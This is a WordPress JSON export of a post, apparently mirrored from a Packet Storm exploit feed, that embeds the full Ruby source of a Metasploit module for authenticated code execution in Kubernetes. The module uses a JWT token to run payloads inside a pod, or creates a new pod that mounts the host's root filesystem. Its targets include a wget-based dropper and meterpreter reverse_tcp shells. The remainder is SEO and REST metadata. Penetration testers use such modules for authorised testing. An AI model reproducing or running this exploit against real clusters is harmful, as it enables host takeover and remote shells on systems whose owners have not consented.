{"id":15172,"date":"2025-08-29T17:45:08","date_gmt":"2025-08-29T17:45:08","guid":{"rendered":"http:\/\/localhost\/?p=15172"},"modified":"2025-08-29T17:45:08","modified_gmt":"2025-08-29T17:45:08","slug":"kubernetes-authenticated-code-execution","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=15172","title":{"rendered":"\ud83d\udcc4 Kubernetes Authenticated Code Execution_PACKETSTORM:208944"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2025-08-28T16:37:08&#8243;,&#8221;description&#8221;:&#8221;This&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-08-28T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2025-08-28T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 Kubernetes Authenticated Code Execution&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:208944&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[],&#8221;sourceData&#8221;:&#8221;# -*- coding: binary -*-\\n    \\n    ##\\n    # This module requires Metasploit: https:\/\/metasploit.com\/download\\n    # Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n    ##\\n    \\n    class MetasploitModule \\u003c Msf::Exploit\\n      Rank = ManualRanking\\n    \\n      include Msf::Exploit::Retry\\n      include Msf::Exploit::Remote::HttpClient\\n      include Msf::Exploit::CmdStager\\n      include Msf::Exploit::Remote::HTTP::Kubernetes\\n    \\n      def initialize(info = {})\\n        super(\\n          update_info(\\n            info,\\n            &#8216;Name&#8217; =\\u003e &#8216;Kubernetes authenticated code execution&#8217;,\\n            &#8216;Description&#8217; =\\u003e %q{\\n              Execute a payload within a Kubernetes pod.\\n            },\\n            &#8216;License&#8217; =\\u003e MSF_LICENSE,\\n            &#8216;Author&#8217; =\\u003e [\\n              &#8216;alanfoster&#8217;,\\n              &#8216;Spencer McIntyre&#8217;\\n            ],\\n            &#8216;References&#8217; =\\u003e [\\n            ],\\n            &#8216;Notes&#8217; =\\u003e {\\n              &#8216;SideEffects&#8217; =\\u003e [\\n                ARTIFACTS_ON_DISK, # the Linux Dropper target uses the command stager which writes to disk\\n                CONFIG_CHANGES, # the Kubernetes configuration is changed if a new pod is created\\n                IOC_IN_LOGS # a log event is generated if a new pod is created\\n              ],\\n              &#8216;Reliability&#8217; =\\u003e [ REPEATABLE_SESSION ],\\n              &#8216;Stability&#8217; =\\u003e [ CRASH_SAFE ]\\n            },\\n            &#8216;DefaultOptions&#8217; =\\u003e {\\n              &#8216;SSL&#8217; =\\u003e true\\n            },\\n            &#8216;Targets&#8217; =\\u003e [\\n              [\\n                &#8216;Interactive WebSocket&#8217;,\\n                {\\n                  &#8216;Arch&#8217; =\\u003e ARCH_CMD,\\n                  &#8216;Platform&#8217; =\\u003e &#8216;unix&#8217;,\\n                  &#8216;Type&#8217; =\\u003e :nix_stream,\\n                  &#8216;DefaultOptions&#8217; =\\u003e {\\n                    &#8216;PAYLOAD&#8217; =\\u003e &#8216;cmd\/unix\/interact&#8217;\\n                  },\\n                  &#8216;Payload&#8217; =\\u003e {\\n                    &#8216;Compat&#8217; =\\u003e {\\n                      &#8216;PayloadType&#8217; =\\u003e &#8216;cmd_interact&#8217;,\\n                      &#8216;ConnectionType&#8217; =\\u003e &#8216;find&#8217;\\n                    }\\n                  }\\n                }\\n              ],\\n              [\\n                &#8216;Unix Command&#8217;,\\n                {\\n                  &#8216;Arch&#8217; =\\u003e ARCH_CMD,\\n                  &#8216;Platform&#8217; =\\u003e &#8216;unix&#8217;,\\n                  &#8216;Type&#8217; =\\u003e :nix_cmd\\n                }\\n              ],\\n              [\\n                &#8216;Linux Dropper&#8217;,\\n                {\\n                  &#8216;Arch&#8217; =\\u003e [ARCH_X86, ARCH_X64],\\n                  &#8216;Platform&#8217; =\\u003e &#8216;linux&#8217;,\\n                  &#8216;Type&#8217; =\\u003e :nix_dropper,\\n                  &#8216;DefaultOptions&#8217; =\\u003e {\\n                    &#8216;CMDSTAGER::FLAVOR&#8217; =\\u003e &#8216;wget&#8217;,\\n                    &#8216;PAYLOAD&#8217; =\\u003e &#8216;linux\/x64\/meterpreter\/reverse_tcp&#8217;\\n                  }\\n                }\\n              ],\\n              [\\n                &#8216;Python&#8217;,\\n                {\\n                  &#8216;Arch&#8217; =\\u003e [ARCH_PYTHON],\\n                  &#8216;Platform&#8217; =\\u003e &#8216;python&#8217;,\\n                  &#8216;Type&#8217; =\\u003e :python,\\n                  &#8216;PAYLOAD&#8217; =\\u003e &#8216;python\/meterpreter\/reverse_tcp&#8217;\\n                }\\n              ]\\n            ],\\n            &#8216;DisclosureDate&#8217; =\\u003e &#8216;2021-10-01&#8217;,\\n            &#8216;DefaultTarget&#8217; =\\u003e 0,\\n            &#8216;Platform&#8217; =\\u003e [ &#8216;linux&#8217;, &#8216;unix&#8217; ],\\n            &#8216;SessionTypes&#8217; =\\u003e [ &#8216;meterpreter&#8217; ]\\n          )\\n        )\\n    \\n        register_options(\\n          [\\n            Opt::RHOSTS(nil, false),\\n            Opt::RPORT(nil, false),\\n            Msf::OptInt.new(&#8216;SESSION&#8217;, [ false, &#8216;An optional session to use for configuration&#8217; ]),\\n            OptString.new(&#8216;TOKEN&#8217;, [ false, &#8216;The JWT token&#8217; ]),\\n            OptString.new(&#8216;POD&#8217;, [ false, &#8216;The pod name to execute in&#8217; ]),\\n            OptString.new(&#8216;NAMESPACE&#8217;, [ false, &#8216;The Kubernetes namespace&#8217;, &#8216;default&#8217; ]),\\n            OptString.new(&#8216;SHELL&#8217;, [true, &#8216;The shell to use for execution&#8217;, &#8216;sh&#8217; ]),\\n          ]\\n        )\\n    \\n        register_advanced_options(\\n          [\\n            OptString.new(&#8216;PodImage&#8217;, [ false, &#8216;The image from which to create the pod&#8217; ]),\\n            OptInt.new(&#8216;PodReadyTimeout&#8217;, [ false, &#8216;The maximum amount time to wait for the pod to be created&#8217;, 40 ]),\\n          ]\\n        )\\n      end\\n    \\n      def pod_name\\n        @pod_name || datastore[&#8216;POD&#8217;]\\n      end\\n    \\n      def create_pod\\n        if datastore[&#8216;PodImage&#8217;].blank?\\n          image_names = @kubernetes_client.list_pods(namespace).fetch(:items, []).flat_map { |pod| pod.dig(:spec, :containers).map { |container| container[:image] } }.uniq\\n          fail_with(Failure::NotFound, &#8216;An image could not be found from which to create a pod, set the PodImage option&#8217;) if image_names.empty?\\n        else\\n          image_names = [ datastore[&#8216;PodImage&#8217;] ]\\n        end\\n    \\n        ready = false\\n        image_names.each do |image_name|\\n          print_status(\\&#8221;Using image: #{image_name}\\&#8221;)\\n    \\n          random_identifiers = Rex::RandomIdentifier::Generator.new({\\n            first_char_set: Rex::Text::LowerAlpha,\\n            char_set: Rex::Text::LowerAlpha + Rex::Text::Numerals\\n          })\\n          new_pod_definition = {\\n            apiVersion: &#8216;v1&#8217;,\\n            kind: &#8216;Pod&#8217;,\\n            metadata: {\\n              name: random_identifiers[:pod_name],\\n              labels: {}\\n            },\\n            spec: {\\n              containers: [\\n                {\\n                  name: random_identifiers[:container_name],\\n                  image: image_name,\\n                  command: [&#8216;\/bin\/sh&#8217;, &#8216;-c&#8217;, &#8216;exec tail -f \/dev\/null&#8217;],\\n                  volumeMounts: [\\n                    {\\n                      mountPath: &#8216;\/host_mnt&#8217;,\\n                      name: random_identifiers[:volume_name]\\n                    }\\n                  ]\\n                }\\n              ],\\n              volumes: [\\n                {\\n                  name: random_identifiers[:volume_name],\\n                  hostPath: {\\n                    path: &#8216;\/&#8217;\\n                  }\\n                }\\n              ]\\n            }\\n          }\\n          new_metadata = @kubernetes_client.create_pod(new_pod_definition, namespace)[:metadata]\\n    \\n          @pod_name = random_identifiers[:pod_name]\\n          print_good(\\&#8221;Pod created: #{pod_name}\\&#8221;)\\n    \\n          print_status(&#8216;Waiting for the pod to be ready&#8230;&#8217;)\\n          ready = retry_until_truthy(timeout: datastore[&#8216;PodReadyTimeout&#8217;]) do\\n            pod = @kubernetes_client.get_pod(pod_name, namespace)\\n            pod_status = pod[:status]\\n            next if pod_status == &#8216;Failure&#8217;\\n    \\n            container_statuses = pod_status[:containerStatuses]\\n            next unless container_statuses\\n    \\n            ready = container_statuses.any? { |status| status[:ready] }\\n            ready\\n          rescue Msf::Exploit::Remote::HTTP::Kubernetes::Error::ServerError =\\u003e e\\n            elog(e)\\n            false\\n          end\\n    \\n          if ready\\n            report_note(\\n              type: &#8216;kubernetes.pod&#8217;,\\n              host: rhost,\\n              port: rport,\\n              data: {\\n                pod: new_metadata.slice(:name, :namespace, :uid, :creationTimestamp),\\n                imageName: image_name\\n              },\\n              update: :unique_data\\n            )\\n    \\n            break\\n          end\\n    \\n          print_error(&#8216;The pod failed to start within the expected timeframe&#8217;)\\n    \\n          begin\\n            @kubernetes_client.delete_pod(@pod_name, namespace)\\n          rescue StandardError\\n            print_error(&#8216;Failed to delete the pod&#8217;)\\n          end\\n        end\\n    \\n        fail_with(Failure::Unknown, &#8216;Failed to create a new pod&#8217;) unless ready\\n      end\\n    \\n      def exploit\\n        if session\\n          print_status(\\&#8221;Routing traffic through session: #{session.sid}\\&#8221;)\\n          configure_via_session\\n        end\\n    \\n        validate_configuration!\\n    \\n        @kubernetes_client = Msf::Exploit::Remote::HTTP::Kubernetes::Client.new({ http_client: self, token: api_token })\\n    \\n        create_pod if pod_name.blank?\\n    \\n        case target[&#8216;Type&#8217;]\\n        when :nix_stream\\n          # Setting tty =\\u003e true allows the shell prompt to be seen but it also causes commands to be echoed back\\n          websocket = @kubernetes_client.exec_pod(\\n            pod_name,\\n            datastore[&#8216;Namespace&#8217;],\\n            datastore[&#8216;Shell&#8217;],\\n            &#8216;stdin&#8217; =\\u003e true,\\n            &#8216;stdout&#8217; =\\u003e true,\\n            &#8216;stderr&#8217; =\\u003e true,\\n            &#8216;tty&#8217; =\\u003e false\\n          )\\n    \\n          print_good(&#8216;Successfully established the WebSocket&#8217;)\\n          channel = Msf::Exploit::Remote::HTTP::Kubernetes::Client::ExecChannel.new(websocket)\\n          handler(channel.lsock)\\n        when :nix_cmd\\n          execute_command(payload.encoded)\\n        when :nix_dropper\\n          execute_cmdstager\\n        else\\n          execute_command(payload.encoded)\\n        end\\n      rescue Rex::Proto::Http::WebSocket::ConnectionError =\\u003e e\\n        res = e.http_response\\n        fail_with(Failure::Unreachable, e.message) if res.nil?\\n        fail_with(Failure::NoAccess, &#8216;Insufficient Kubernetes access&#8217;) if res.code == 401 || res.code == 403\\n        fail_with(Failure::Unknown, e.message)\\n      else\\n        report_service(host: rhost, port: rport, proto: &#8216;tcp&#8217;, name: &#8216;kubernetes&#8217;)\\n      end\\n    \\n      def execute_command(cmd, _opts = {})\\n        case target[&#8216;Platform&#8217;]\\n        when &#8216;python&#8217;\\n          command = [datastore[&#8216;Shell&#8217;], &#8216;-c&#8217;, \\&#8221;exec $(which python || which python3 || which python2) -c #{Shellwords.escape(cmd)}\\&#8221;]\\n        else\\n          command = [datastore[&#8216;Shell&#8217;], &#8216;-c&#8217;, cmd]\\n        end\\n    \\n        result = @kubernetes_client.exec_pod_capture(\\n          pod_name,\\n          datastore[&#8216;Namespace&#8217;],\\n          command,\\n          &#8216;stdin&#8217; =\\u003e false,\\n          &#8216;stdout&#8217; =\\u003e true,\\n          &#8216;stderr&#8217; =\\u003e true,\\n          &#8216;tty&#8217; =\\u003e false\\n        ) do |stdout, stderr|\\n          print_line(stdout.strip) unless stdout.blank?\\n          print_line(stderr.strip) unless stderr.blank?\\n        end\\n    \\n        fail_with(Failure::Unknown, &#8216;Failed to execute the command&#8217;) if result.nil?\\n    \\n        status = result\\u0026.dig(:error, &#8216;status&#8217;)\\n        fail_with(Failure::Unknown, \\&#8221;Status: #{status || &#8216;Unknown&#8217;}\\&#8221;) unless status == &#8216;Success&#8217;\\n      end\\n    end&#8221;,&#8221;sourceHref&#8221;:&#8221;https:\/\/packetstorm.news\/download\/208944&#8243;,&#8221;cvss&#8221;:{&#8220;score&#8221;:0,&#8221;severity&#8221;:&#8221;NONE&#8221;,&#8221;vector&#8221;:&#8221;NONE&#8221;,&#8221;version&#8221;:&#8221;NONE&#8221;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/packetstorm.news\/files\/id\/208944\/&#8221;,&#8221;category_name&#8221;:&#8221;Exploit&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2025-08-28T16:37:08&#8243;,&#8221;description&#8221;:&#8221;This&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-08-28T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2025-08-28T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 Kubernetes Authenticated Code Execution&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:208944&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[],&#8221;sourceData&#8221;:&#8221;# -*- coding: binary -*-\\n \\n ##\\n # This module requires Metasploit: https:\/\/metasploit.com\/download\\n # Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n ##\\n \\n class MetasploitModule&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,13,33,53,7,11,5],"class_list":["post-15172","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-news","tag-none","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>\ud83d\udcc4 Kubernetes Authenticated Code Execution_PACKETSTORM:208944 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=15172\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 Kubernetes Authenticated Code Execution_PACKETSTORM:208944 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{&#8220;lastseen&#8221;:&#8221;2025-08-28T16:37:08&#8243;,&#8221;description&#8221;:&#8221;This&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-08-28T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2025-08-28T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 Kubernetes Authenticated Code Execution&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:208944&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[],&#8221;sourceData&#8221;:&#8221;# -*- coding: binary -*-n n ##n # This module requires Metasploit: https:\/\/metasploit.com\/downloadn # Current source: https:\/\/github.com\/rapid7\/metasploit-frameworkn ##n n class MetasploitModule...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=15172\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2025-08-29T17:45:08+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"7 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=15172#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=15172\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 Kubernetes Authenticated Code Execution_PACKETSTORM:208944\",\"datePublished\":\"2025-08-29T17:45:08+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=15172\"},\"wordCount\":1360,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"exploit\",\"news\",\"NONE\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=15172#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=15172\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=15172\",\"name\":\"\ud83d\udcc4 Kubernetes Authenticated Code Execution_PACKETSTORM:208944 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2025-08-29T17:45:08+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=15172#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=15172\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=15172#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 Kubernetes Authenticated Code Execution_PACKETSTORM:208944\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 Kubernetes Authenticated Code Execution_PACKETSTORM:208944 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=15172","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 Kubernetes Authenticated Code Execution_PACKETSTORM:208944 - zero redgem","og_description":"{&#8220;lastseen&#8221;:&#8221;2025-08-28T16:37:08&#8243;,&#8221;description&#8221;:&#8221;This&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-08-28T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2025-08-28T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 Kubernetes Authenticated Code Execution&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:208944&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[],&#8221;sourceData&#8221;:&#8221;# -*- coding: binary -*-n n ##n # This module requires Metasploit: https:\/\/metasploit.com\/downloadn # Current source: https:\/\/github.com\/rapid7\/metasploit-frameworkn ##n n class MetasploitModule...","og_url":"https:\/\/zero.redgem.net\/?p=15172","og_site_name":"zero redgem","article_published_time":"2025-08-29T17:45:08+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"7 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=15172#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=15172"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 Kubernetes Authenticated Code Execution_PACKETSTORM:208944","datePublished":"2025-08-29T17:45:08+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=15172"},"wordCount":1360,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","exploit","news","NONE","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=15172#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=15172","url":"https:\/\/zero.redgem.net\/?p=15172","name":"\ud83d\udcc4 Kubernetes Authenticated Code Execution_PACKETSTORM:208944 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2025-08-29T17:45:08+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=15172#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=15172"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=15172#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 Kubernetes Authenticated Code Execution_PACKETSTORM:208944"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/15172","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=15172"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/15172\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=15172"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=15172"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=15172"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}